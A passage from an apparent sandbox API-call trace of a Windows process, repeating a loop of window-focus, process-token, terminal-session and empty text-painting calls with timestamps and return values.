TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.769] GetLastError () returned 0x7a [0220.769] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.769] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.769] WTSFreeMemory (pMemory=0x0) [0220.769] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.770] TextOutW (hdc=0x0, x=214, y=299, lpString="", c=0) returned 1 [0220.770] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.770] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.770] GetTickCount () returned 0xe203 [0220.770] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.770] SetForegroundWindow (hWnd=0x0) returned 0 [0220.770] BringWindowToTop (hWnd=0x0) returned 0 [0220.770] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x280) returned 1 [0220.770] GetTokenInformation (in: TokenHandle=0x280, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.770] GetLastError () returned 0x7a [0220.770] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.770] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.771] WTSFreeMemory (pMemory=0x0) [0220.771] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.771] TextOutW (hdc=0x0, x=224, y=324, lpString="", c=0) returned 1 [0220.771] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.771] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.771] GetTickCount () returned 0xe213 [0220.776] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.776] SetForegroundWindow (hWnd=0x0) returned 0 [0220.776] BringWindowToTop (hWnd=0x0) returned 0 [0220.776] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x284) returned 1 [0220.776] GetTokenInformation (in: TokenHandle=0x284, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.776] GetLastError () returned 0x7a [0220.776] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.776] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.777] WTSFreeMemory (pMemory=0x0) [0220.777] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.777] TextOutW (hdc=0x0, x=234, y=349, lpString="", c=0) returned 1 [0220.777] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.777] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.777] GetTickCount () returned 0xe213 [0220.789] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.789] SetForegroundWindow (hWnd=0x0) returned 0 [0220.789] BringWindowToTop (hWnd=0x0) returned 0 [0220.789] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x288) returned 1 [0220.789] GetTokenInformation (in: TokenHandle=0x288, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.790] GetLastError () returned 0x7a [0220.790] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.790] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.790] WTSFreeMemory (pMemory=0x0) [0220.790] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.790] TextOutW (hdc=0x0, x=244, y=374, lpString="", c=0) returned 1 [0220.790] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.790] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.790] GetTickCount () returned 0xe222 [0220.791] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.791] SetForegroundWindow (hWnd=0x0) returned 0 [0220.791] BringWindowToTop (hWnd=0x0) returned 0 [0220.791] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x28c) returned 1 [0220.791] GetTokenInformation (in: TokenHandle=0x28c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.791] GetLastError () returned 0x7a [0220.791] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.791] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.792] WTSFreeMemory (pMemory=0x0) [0220.792] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.792] TextOutW (hdc=0x0, x=254, y=399, lpString="", c=0) returned 1 [0220.792] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.792] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.792] GetTickCount () returned 0xe222 [0220.792] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.792] SetForegroundWindow (hWnd=0x0) returned 0 [0220.792] BringWindowToTop (hWnd=0x0) returned 0 [0220.792] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x290) returned 1 [0220.793] GetTokenInformation (in: TokenHandle=0x290, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.793] GetLastError () returned 0x7a [0220.793] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.793] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.793] WTSFreeMemory (pMemory=0x0) [0220.793] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.793] TextOutW (hdc=0x0, x=264, y=424, lpString="", c=0) returned 1 [0220.793] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.793] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.793] GetTickCount () returned 0xe222 [0220.794] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.794] SetForegroundWindow (hWnd=0x0) returned 0 [0220.794] BringWindowToTop (hWnd=0x0) returned 0 [0220.794] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x294) returned 1 [0220.794] GetTokenInformation (in: TokenHandle=0x294, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.794] GetLastError () returned 0x7a [0220.794] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.794] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.794] WTSFreeMemory (pMemory=0x0) [0220.794] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.795] TextOutW (hdc=0x0, x=274, y=449, lpString="", c=0) returned 1 [0220.795] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.795] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.795] GetTickCount () returned 0xe222 [0220.806] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.806] SetForegroundWindow (hWnd=0x0) returned 0 [0220.806] BringWindowToTop (hWnd=0x0) returned 0 [0220.806] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x298) returned 1 [0220.806] GetTokenInformation (in: TokenHandle=0x298, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.806] GetLastError () returned 0x7a [0220.806] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.806] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.807] WTSFreeMemory (pMemory=0x0) [0220.807] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.807] TextOutW (hdc=0x0, x=284, y=474, lpString="", c=0) returned 1 [0220.807] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.807] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.807] GetTickCount () returned 0xe232 [0220.808] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.808] SetForegroundWindow (hWnd=0x0) returned 0 [0220.808] BringWindowToTop (hWnd=0x0) returned 0 [0220.808] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x29c) returned 1 [0220.808] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.808] GetLastError () returned 0x7a [0220.808] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.808] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.809] WTSFreeMemory (pMemory=0x0) [0220.809] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.809] TextOutW (hdc=0x0, x=294, y=499, lpString="", c=0) returned 1 [0220.809] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.809] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.809] GetTickCount () returned 0xe232 [0220.810] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.810] SetForegroundWindow (hWnd=0x0) returned 0 [0220.810] BringWindowToTop (hWnd=0x0) returned 0 [0220.810] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x2a0) returned 1 [0220.810] GetTokenInformation (in: TokenHandle=0x2a0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.810] GetLastError () returned 0x7a [0220.810] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.810] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.811] WTSFreeMemory (pMemory=0x0) [0220.811] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.811] TextOutW (hdc=0x0, x=304, y=524, lpString="", c=0) returned 1 [0220.811] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.811] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.811] GetTickCount () returned 0xe232 [0220.812] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.812] SetForegroundWindow (hWnd=0x0) returned 0 [0220.812] BringWindowToTop (hWnd=0x0) returned 0 [0220.812] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x2a4) returned 1 [0220.812] GetTokenInformation (in: TokenHandle=0x2a4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.812] GetLastError () returned 0x7a [0220.812] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.812] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.813] WTSFreeMemory (pMemory=0x0) [0220.813] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.813] TextOutW (hdc=0x0, x=314, y=549, lpString="", c=0) returned 1 [0220.813] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.813] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.813] GetTickCount () returned 0xe232 [0220.814] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.815] SetForegroundWindow (hWnd=0x0) returned 0 [0220.815] BringWindowToTop (hWnd=0x0) returned 0 [0220.815] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x2a8) returned 1 [0220.815] GetTokenInformation (in: TokenHandle=0x2a8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.815] GetLastError () returned 0x7a [0220.815] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.815] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.816] WTSFreeMemory (pMemory=0x0) [0220.816] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.816] TextOutW (hdc=0x0, x=324, y=574, lpString="", c=0) returned 1 [0220.816] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.816] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.816] GetTickCount () returned 0xe232 [0220.819] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.819] SetForegroundWindow (hWnd=0x0) returned 0 [0220.819] BringWindowToTop (hWnd=0x0) returned 0 [0220.819] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x2ac) returned 1 [0220.819] GetTokenInformation (in: TokenHandle=0x2ac, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.819] GetLastError () returned 0x7a [0220.819] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.819] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.819] WTSFreeMemory (pMemory=0x0) [0220.820] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.820] TextOutW (hdc=0x0, x=334, y=599, lpString="", c=0) returned 1 [0220.820] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.820] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.820] GetTickCount () returned 0xe241 [0220.820] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.820] SetForegroundWindow (hWnd=0x0) returned 0 [0220.820] BringWindowToTop (hWnd=0x0) returned 0 [0220.820] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x2b0) returned 1 [0220.820] GetTokenInformation (in: TokenHandle=0x2b0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.820] GetLastError () returned 0x7a [0220.820] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.820] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.821] WTSFreeMemory (pMemory=0x0) [0220.821] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.821] TextOutW (hdc=0x0, x=344, y=624, lpString="", c=0) returned 1 [0220.821] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.821] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.821] GetTickCount () returned 0xe241 [0220.822] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.824] SetForegroundWindow (hWnd=0x0) returned 0 [0220.824] BringWindowToTop (hWnd=0x0) returned 0 [0220.824] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x2b4) returned 1 [0220.825] GetTokenInformation (in: TokenHandle=0x2b4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.825] GetLastError () returned 0x7a [0220.825] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.825] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.825] WTSFreeMemory (pMemory=0x0) [0220.825] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.825] TextOutW (hdc=0x0, x=354, y=649, lpString="", c=0) returned 1 [0220.825] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.825] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.825] GetTickCount () returned 0xe241 [0220.827] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.827] SetForegroundWindow (hWnd=0x0) returned 0 [0220.827] BringWindowToTop (hWnd=0x0) returned 0 [0220.827] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x2b8) returned 1 [0220.827] GetTokenInformation (in: TokenHandle=0x2b8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.827] GetLastError () returned 0x7a [0220.827] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.827] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.827] WTSFreeMemory (pMemory=0x0) [0220.827] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.828] TextOutW (hdc=0x0, x=364, y=674, lpString="", c=0) returned 1 [0220.828] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.828] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.828] GetTickCount () returned 0xe241 [0220.828] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.828] SetForegroundWindow (hWnd=0x0) returned 0 [0220.829] BringWindowToTop (hWnd=0x0) returned 0 [0220.829] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x2bc) returned 1 [0220.829] GetTokenInformation (in: TokenHandle=0x2bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.829] GetLastError () returned 0x7a [0220.829] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.829] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.829] WTSFreeMemory (pMemory=0x0) [0220.829] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.829] TextOutW (hdc=0x0, x=374, y=699, lpString="", c=0) returned 1 [0220.829] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.830] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.830] GetTickCount () returned 0xe241 [0220.831] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.831] SetForegroundWindow (hWnd=0x0) returned 0 [0220.831] BringWindowToTop (hWnd=0x0) returned 0 [0220.831] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x2c0) returned 1 [0220.831] GetTokenInformation (in: TokenHandle=0x2c0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.831] GetLastError () returned 0x7a [0220.831] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.831] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.832] WTSFreeMemory (pMemory=0x0) [0220.832] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.832] TextOutW (hdc=0x0, x=384, y=724, lpString="", c=0) returned 1 [0220.832] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.832] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.832] GetTickCount () returned 0xe241 [0220.833] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.833] SetForegroundWindow (hWnd=0x0) returned 0 [0220.833] BringWindowToTop (hWnd=0x0) returned 0 [0220.836] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x2c4) returned 1 [0220.836] GetTokenInformation (in: TokenHandle=0x2c4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.837] GetLastError () returned 0x7a [0220.837] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.837] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.837] WTSFreeMemory (pMemory=0x0) [0220.837] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.837] TextOutW (hdc=0x0, x=394, y=749, lpString="", c=0) returned 1 [0220.837] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.837] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.837] GetTickCount () returned 0xe251 [0220.838] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.838] SetForegroundWindow (hWnd=0x0) returned 0 [0220.838] BringWindowToTop (hWnd=0x0) returned 0 [0220.838] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x2c8) returned 1 [0220.838] GetTokenInformation (in: TokenHandle=0x2c8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.838] GetLastError () returned 0x7a [0220.838] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.838] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0220.839] WTSFreeMemory (pMemory=0x0) [0220.839] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0220.839] TextOutW (hdc=0x0, x=404, y=774, lpString="", c=0) returned 1 [0220.839] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0220.839] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0220.839] GetTickCount () returned 0xe251 [0220.842] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0220.842] SetForegroundWindow (hWnd=0x0) returned 0 [0220.842] BringWindowToTop (hWnd=0x0) returned 0 [0220.842] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x2cc) returned 1 [0220.842] GetTokenInformation (in: TokenHandle=0x2cc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0220.842] GetLastError () returned 0x7a [0220.842] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0220.842] 